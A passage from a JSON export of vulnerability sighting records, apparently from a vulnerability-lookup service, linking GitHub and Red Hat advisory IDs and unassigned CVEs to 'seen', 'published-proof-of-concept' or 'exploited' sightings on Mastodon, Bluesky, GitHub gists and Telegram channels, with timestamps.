"2024-12-03T15:52:34.858826Z"}, {"uuid": "65a8d1d5-c84e-4f5b-9b7c-4e51e05c0fd0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v5h2-q2w4-gpcx", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113528383566189459", "content": "", "creation_timestamp": "2024-11-22T20:00:58.061998Z"}, {"uuid": "b3fb7cb6-9869-4d8a-a62c-bc9112c09eec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mh2x-fcqh-fmqv", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113545203299807277", "content": "", "creation_timestamp": "2024-11-25T19:18:26.779457Z"}, {"uuid": "c9d1b8ce-526c-4c13-8d9b-95bf69c1853d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-475j-wc37-6274", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113551881054414514", "content": "", "creation_timestamp": "2024-11-26T23:36:41.411326Z"}, {"uuid": "57c78d1f-4137-40dd-a602-01980d35c367", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-84qc-7773-2gg3", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113545237467385913", "content": "", "creation_timestamp": "2024-11-25T19:27:08.178421Z"}, {"uuid": "a37a0904-b765-4e70-ba0d-916922e60b3e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-66q9-2rvx-qfj5", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113590786109034662", "content": "", "creation_timestamp": "2024-12-03T20:30:45.186624Z"}, {"uuid": "dec68236-f22e-4e69-a944-bb9f61198f20", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-r7pm-f93f-f7fp", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113659427755343076", "content": "", "creation_timestamp": "2024-12-15T23:27:13.652631Z"}, {"uuid": "83e6899a-4e57-4f26-8dd8-309ad6cf9fad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cwq8-g58r-32hg", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113664290630673496", "content": "", "creation_timestamp": "2024-12-16T20:03:55.145070Z"}, {"uuid": "1fdee702-388d-47cb-9354-866f414e3bab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xhcr-cqfr-m3hv", "type": "seen", "source": "https://gist.github.com/alon710/e4526779d0dd30df21e6558b32894929", "content": "", "creation_timestamp": "2026-08-18T11:34:49.849524Z"}, {"uuid": "4ce7d19a-099f-4a47-82de-99ea80ad9ae7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-j659-8xh6-5pq5", "type": "seen", "source": "https://gist.github.com/alon710/10698dbbc358e681dffa6e3a9906a312", "content": "", "creation_timestamp": "2026-08-18T10:31:34.358155Z"}, {"uuid": "f581bdaf-e300-4910-97d1-4a123566f24e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-MPWR-8VM7-H73F", "type": "seen", "source": "https://gist.github.com/alon710/2b9e0ac9d204b77b1b6db1f2d326bdfa", "content": "", "creation_timestamp": "2026-08-18T06:31:46.945788Z"}, {"uuid": "f98e41cf-1ff4-425c-8f77-500bfc8c306d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mqjf-5f49-2fjh", "type": "seen", "source": "https://bsky.app/profile/kotosecurity.bsky.social/post/3mt6cnagzpw2o", "content": "", "creation_timestamp": "2026-08-16T04:04:29.310813Z"}, {"uuid": "335754f1-c4b5-4515-a6ad-fc0f59e63cb5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-X744-4WPC-V9H2", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityExploit/31014", "content": "", "creation_timestamp": "2026-08-16T00:00:25.640975Z"}, {"uuid": "da8bfd7a-773e-430b-91f5-59d5e6c4216b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-X744-4WPC-V9H2", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityExploit/31013", "content": "", "creation_timestamp": "2026-08-16T00:00:25.381258Z"}, {"uuid": "9fd1e16a-7ef3-4968-8600-9db990a2416f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-66H4-QJ4X-38XP", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityExploit/29329", "content": "", "creation_timestamp": "2026-08-16T00:00:23.568064Z"}, {"uuid": "76239d89-f69f-4d70-9f9b-0bc4ec161dc0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-X692-Q9X7-8C3F", "type": "published-proof-of-concept", "source": "Telegram/9qYdJNeZ50siptVHrqc-g91N4K0CPGozDwGl0Etd8sr4-fM", "content": "", "creation_timestamp": "2026-08-16T00:00:22.315292Z"}, {"uuid": "e5add153-4514-4931-9d5f-a369c9123893", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-XQ3M-2V4X-88GG", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityExploit/31537", "content": "", "creation_timestamp": "2026-08-15T14:00:04.650818Z"}, {"uuid": "7ab02820-18ba-4fc0-b285-22e7fff7efee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-XQ3M-2V4X-88GG", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityExploit/31536", "content": "", "creation_timestamp": "2026-08-15T14:00:04.335411Z"}, {"uuid": "e4135a59-f6ec-4a74-beff-37847b271ba1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-X744-4WPC-V9H2", "type": "seen", "source": "https://t.me/CyberSecurityExploit/31013", "content": "", "creation_timestamp": "2026-08-15T12:00:03.774496Z"}, {"uuid": "84a9399b-3a73-48cc-a807-67ff595908cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-X744-4WPC-V9H2", "type": "seen", "source": "https://t.me/CyberSecurityExploit/31014", "content": "", "creation_timestamp": "2026-08-15T12:00:03.260363Z"}, {"uuid": "8fed6ec2-9393-4922-815c-3a36cf4607b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mqjf-5f49-2fjh", "type": "seen", "source": "https://bsky.app/profile/nihonmatsu.bsky.social/post/3mt4jk4pkec2r", "content": "", "creation_timestamp": "2026-08-15T11:02:43.173084Z"}, {"uuid": "a52f2e09-4069-474b-88f4-a487f5e1828c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mqjf-5f49-2fjh", "type": "seen", "source": "https://bsky.app/profile/nihonmatsu.bsky.social/post/3mt4jk4pjf22r", "content": "", "creation_timestamp": "2026-08-15T11:02:42.729452Z"}, {"uuid": "1b97a228-9215-4777-8aaf-0e1567d6b41e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mqjf-5f49-2fjh", "type": "seen", "source": "https://bsky.app/profile/nihonmatsu.bsky.social/post/3mt4jjzzdl22r", "content": "", "creation_timestamp": "2026-08-15T11:02:42.275206Z"}, {"uuid": "2b7dea13-260f-46b4-aabe-4eb4a8c202f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-66H4-QJ4X-38XP", "type": "seen", "source": "https://t.me/CyberSecurityExploit/29329", "content": "", "creation_timestamp": "2026-08-15T11:00:07.671941Z"}, {"uuid": "25d73c43-2e23-4961-983c-ad9d8a679f08", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-JM29-P7HH-VJHV", "type": "seen", "source": "https://t.me/bdufstecru/3378", "content": "", "creation_timestamp": "2026-08-12T15:00:03.534628Z"}, {"uuid": "2eddf3d0-b6ed-4583-bb01-fcd6a19d9547", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-pmv8-rq9r-6j72", "type": "seen", "source": "https://bsky.app/profile/lambdawatchdog.bsky.social/post/3msv3gomqqu2a", "content": "", "creation_timestamp": "2026-08-12T12:01:35.485928Z"}, {"uuid": "7b88a9fc-fdbf-42a2-a5d0-6de1b7d3ba3f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mwf2-3pr3-8698", "type": "seen", "source": "https://bsky.app/profile/lambdawatchdog.bsky.social/post/3msv3gnshgq2p", "content": "", "creation_timestamp": "2026-08-12T12:01:34.469462Z"}, {"uuid": "915d954e-0f06-4628-8875-c782af0f4122", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mmx7-hfxf-jppx", "type": "seen", "source": "https://bsky.app/profile/lambdawatchdog.bsky.social/post/3msv3gmvgco2a", "content": "", "creation_timestamp": "2026-08-12T12:01:33.657838Z"}, {"uuid": "dea03eea-8ac7-44c2-b3f4-aaae7c9b6d82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jqh4-m9w3-8hp9", "type": "seen", "source": "https://bsky.app/profile/lambdawatchdog.bsky.social/post/3msv3gmhtf62e", "content": "", "creation_timestamp": "2026-08-12T12:01:33.082972Z"}, {"uuid": "66dae4bf-b184-45c2-a546-25dd87f618f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hcpx-6fm6-wx23", "type": "seen", "source": "https://bsky.app/profile/lambdawatchdog.bsky.social/post/3msv3gl74af2k", "content": "", "creation_timestamp": "2026-08-12T12:01:32.306992Z"}, {"uuid": "cbf78df1-aa11-421c-ab0a-8dc282200ab1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f4gw-2p7v-4548", "type": "seen", "source": "https://bsky.app/profile/lambdawatchdog.bsky.social/post/3msv3gkmrec2t", "content": "", "creation_timestamp": "2026-08-12T12:01:31.484408Z"}, {"uuid": "32aea79f-03e1-446a-842f-e6be91161b7b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7q8q-rj6j-mhjq", "type": "seen", "source": "https://bsky.app/profile/lambdawatchdog.bsky.social/post/3msv3gjvkq425", "content": "", "creation_timestamp": "2026-08-12T12:01:30.818945Z"}, {"uuid": "800ee32c-67e9-4827-b09a-69b49b553aac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-42h9-826w-cgv3", "type": "seen", "source": "https://bsky.app/profile/lambdawatchdog.bsky.social/post/3msv3gjjnyu2a", "content": "", "creation_timestamp": "2026-08-12T12:01:30.040620Z"}, {"uuid": "ee4ce208-9549-4820-998b-3f8e2a22e18d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gcfj-64vw-6mp9", "type": "seen", "source": "https://bsky.app/profile/lambdawatchdog.bsky.social/post/3msv3gj2nts2t", "content": "", "creation_timestamp": "2026-08-12T12:01:29.490885Z"}, {"uuid": "1093efe6-4aec-4c1d-8f73-35fbc2b2850d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-CWH8-W64C-4J5H", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/97436", "content": "", "creation_timestamp": "2026-08-10T14:00:03.804636Z"}, {"uuid": "c592f31a-ff4d-47cf-898e-227aa18f25e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-034", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/117071416518732349", "content": "", "creation_timestamp": "2026-08-10T13:20:52.159272Z"}, {"uuid": "5e62f8c9-8b67-4a36-b140-e91d8121c068", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-034", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3msq6wlexks2z", "content": "", "creation_timestamp": "2026-08-10T13:20:51.069159Z"}, {"uuid": "0f792269-314b-47c0-84f5-fa535f0b3e53", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-x574-m823-4x7w", "type": "seen", "source": "https://gist.github.com/reewardius/63454afa052bb112ef7f9bcd5f9fa7af", "content": "", "creation_timestamp": "2026-08-10T10:24:21.779397Z"}, {"uuid": "71ac4475-4c44-4db7-873a-b485a02a5d2a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hr7p-wg7r-hg9m", "type": "seen", "source": "https://gist.github.com/alon710/937397e52a8e0970b2abb603a8f2aff3", "content": "", "creation_timestamp": "2026-07-30T23:32:08.924237Z"}, {"uuid": "4239209f-1c1b-4e40-b3d8-b84c70489658", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-36h5-qg4p-q2qf", "type": "seen", "source": "https://gist.github.com/alon710/702cdfae67a6daa77470a0a110e821f9", "content": "", "creation_timestamp": "2026-09-25T06:30:32.000000Z"}, {"uuid": "57099798-8403-49ae-a8b4-2f0277bf87a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-VCVR-R3JV-PC5J", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/103144", "content": "", "creation_timestamp": "2026-09-23T15:06:05.000000Z"}, {"uuid": "44e84032-1e3f-40c3-81df-7b25848fb114", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-WX4J-MVGX-MQWP", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/103144", "content": "", "creation_timestamp": "2026-09-23T15:06:05.000000Z"}, {"uuid": "3ece563f-dc1f-4d1a-adbb-4821c1dc743a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7HP8-65CH-5WHP", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/103129", "content": "", "creation_timestamp": "2026-09-23T12:00:07.000000Z"}, {"uuid": "34c95b11-dd51-4c37-ab5a-623854000055", "vulnerability_lookup_origin": "c8fb6bf1-f81f-4cb8-95b1-eadbb3b54ee8", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CVE-UNASSIGNED-2020-ZYXEL-CPE-COMMAND-INJECTION-RCE-01", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/7a5b5786-b418-4a38-b09b-03ba93dca08c", "content": "", "creation_timestamp": "2026-06-30T09:39:37.655771Z"}, {"uuid": "c1c5719a-45a7-469c-b93b-4664c85e3320", "vulnerability_lookup_origin": "c8fb6bf1-f81f-4cb8-95b1-eadbb3b54ee8", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "OPENVAS-1361412562310107187", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/a02f903e-edd2-42ad-bee4-6ff26276893f", "content": "", "creation_timestamp": "2026-06-30T09:58:21.307935Z"}, {"uuid": "9093d0c0-155e-4bda-9789-7a1d41b1da10", "vulnerability_lookup_origin": "c8fb6bf1-f81f-4cb8-95b1-eadbb3b54ee8", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CVE-UNASSIGNED-2020-SAMSUNG-WLAN-AP-RCE-01", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/38da8f85-bb02-4be1-85fb-378e980285c8", "content": "", "creation_timestamp": "2026-06-30T09:59:18.657042Z"}, {"uuid": "2024950e-1d0d-4df9-8b20-62781516eca2", "vulnerability_lookup_origin": "c8fb6bf1-f81f-4cb8-95b1-eadbb3b54ee8", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CVE-UNASSIGNED-2022-RUIJIE-RCE-01", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/bc64bc47-5865-48a1-ab28-b41f86f52766", "content": "", "creation_timestamp": "2026-06-30T10:00:32.925676Z"}, {"uuid": "a5ff79c8-51b4-4d8b-b54c-6233523c72ac", "vulnerability_lookup_origin": "c8fb6bf1-f81f-4cb8-95b1-eadbb3b54ee8", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CVE-UNASSIGNED-2022-HIKVISION-MANAGEMENT-PLATFORM-RCE-01", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/98553c66-c0b0-453f-8325-37efb35aaa5b", "content": "", "creation_timestamp": "2026-06-30T10:00:36.290929Z"}, {"uuid": "f8e29b73-f6fc-4889-bc82-988b6a0cd354", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7HP8-65CH-5WHP", "type": "published-proof-of-concept", "source": "https://t.me/HackingTeamGrupoOfficial/49461", "content": "", "creation_timestamp": "2026-09-27T09:00:33.000000Z"}, {"uuid": "2901390b-2349-4d4e-a3ae-ff7f4f3f1252", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-r9pp-r4xf-597r", "type": "seen", "source": "", "content": "", "creation_timestamp": "2024-10-28T19:39:46.056711Z"}, {"uuid": "6b2b1c3d-6ae3-4cca-b7d2-02db650a82ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2hmf-p27w-phf9", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113431700097332580", "content": "", "creation_timestamp": "2024-11-05T18:13:05.293000Z"}, {"uuid": "5e21f5dc-ba19-489f-9d1a-618a55a3f4a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xvxq-g8hw-fx4g", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113431751216263751", "content": "", "creation_timestamp": "2024-11-05T18:26:05.501284Z"}, {"uuid": "5221f279-6aa9-4168-9ac7-bab635edecd1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cc6x-8cc7-9953", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113431751259368922", "content": "", "creation_timestamp": "2024-11-05T18:26:06.116627Z"}, {"uuid": "9a4b3d76-4566-4e36-8df7-42b081156ad2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w9g8-mxm5-ph62", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113431810262179634", "content": "", "creation_timestamp": "2024-11-05T18:41:06.268030Z"}, {"uuid": "a5a5943b-1d0a-4be6-a59f-7f6e22147338", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8rw6-g96j-3w7m", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113431836014035976", "content": "", "creation_timestamp": "2024-11-05T18:47:40.221569Z"}, {"uuid": "1efec5c0-eb8f-4912-9943-05341a56490b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qrv6-3q86-qv89", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113431836000326931", "content": "", "creation_timestamp": "2024-11-05T18:47:40.291785Z"}, {"uuid": "b5ceb2eb-b946-49c1-b7d3-f871e4901e13", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-53xh-mjmq-j35p", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113431835985090910", "content": "", "creation_timestamp": "2024-11-05T18:47:40.324947Z"}, {"uuid": "20f5343b-3b82-4229-b476-cce3081f2aae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5wmg-9cvh-qw25", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113431972336700443", "content": "", "creation_timestamp": "2024-11-05T19:22:19.416468Z"}, {"uuid": "dcf1bfc3-e17a-46b1-8208-010bd11b0524", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v2qh-f584-6hj8", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113431972351708222", "content": "", "creation_timestamp": "2024-11-05T19:22:19.513691Z"}, {"uuid": "bcba878a-ace1-4365-be29-162f67c3e933", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7jc6-j236-vvjw", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113448802607915052", "content": "", "creation_timestamp": "2024-11-08T18:42:28.867648Z"}, {"uuid": "2d82c531-0349-4f85-b2b0-694ae6381ede", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7hpf-g48v-hw3j", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113470946887369739", "content": "", "creation_timestamp": "2024-11-12T16:34:03.866574Z"}, {"uuid": "6799b8b3-29fd-4a37-93b0-863242f294e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-j7wq-r9mg-9wpv", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113471023692988977", "content": "", "creation_timestamp": "2024-11-12T16:53:35.811260Z"}, {"uuid": "071bc374-1bdb-425c-bdda-85323c298a82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1867", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113497810108556154", "content": "", "creation_timestamp": "2024-11-17T10:25:44.061176Z"}, {"uuid": "dbb20a05-f490-4a9a-b629-c540ded87fea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1868", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113497810108556154", "content": "", "creation_timestamp": "2024-11-17T10:25:44.088111Z"}, {"uuid": "e53c3c35-6266-4c36-bb93-61436dbfbd3b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1674", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113497810158138244", "content": "", "creation_timestamp": "2024-11-17T10:25:45.013857Z"}, {"uuid": "8b765b38-6217-448e-ac6f-e7dace302838", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1675", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113497810158138244", "content": "", "creation_timestamp": "2024-11-17T10:25:45.054067Z"}, {"uuid": "9c7cdded-460a-48c6-bdb9-fb46c5155d2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1676", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113497810158138244", "content": "", "creation_timestamp": "2024-11-17T10:25:45.084979Z"}, {"uuid": "0dad3016-f10c-4a5b-8787-7734267f86f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1677", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113497810158138244", "content": "", "creation_timestamp": "2024-11-17T10:25:45.113030Z"}, {"uuid": "2594ba0b-655f-4fb1-8f9f-e78768bae726", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:2763", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113497810158138244", "content": "", "creation_timestamp": "2024-11-17T10:25:45.139601Z"}, {"uuid": "7bc68b58-c4fc-4512-b611-5eba89a7be8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:2764", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113497810158138244", "content": "", "creation_timestamp": "2024-11-17T10:25:45.167912Z"}, {"uuid": "e8708dbb-6c82-4de1-8064-23991569c5f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:3919", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113497810158138244", "content": "", "creation_timestamp": "2024-11-17T10:25:45.196320Z"}, {"uuid": "cb9abeff-8fdd-415f-96dc-28d52071bf12", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:2737", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113497869157795659", "content": "", "creation_timestamp": "2024-11-17T10:40:45.160344Z"}, {"uuid": 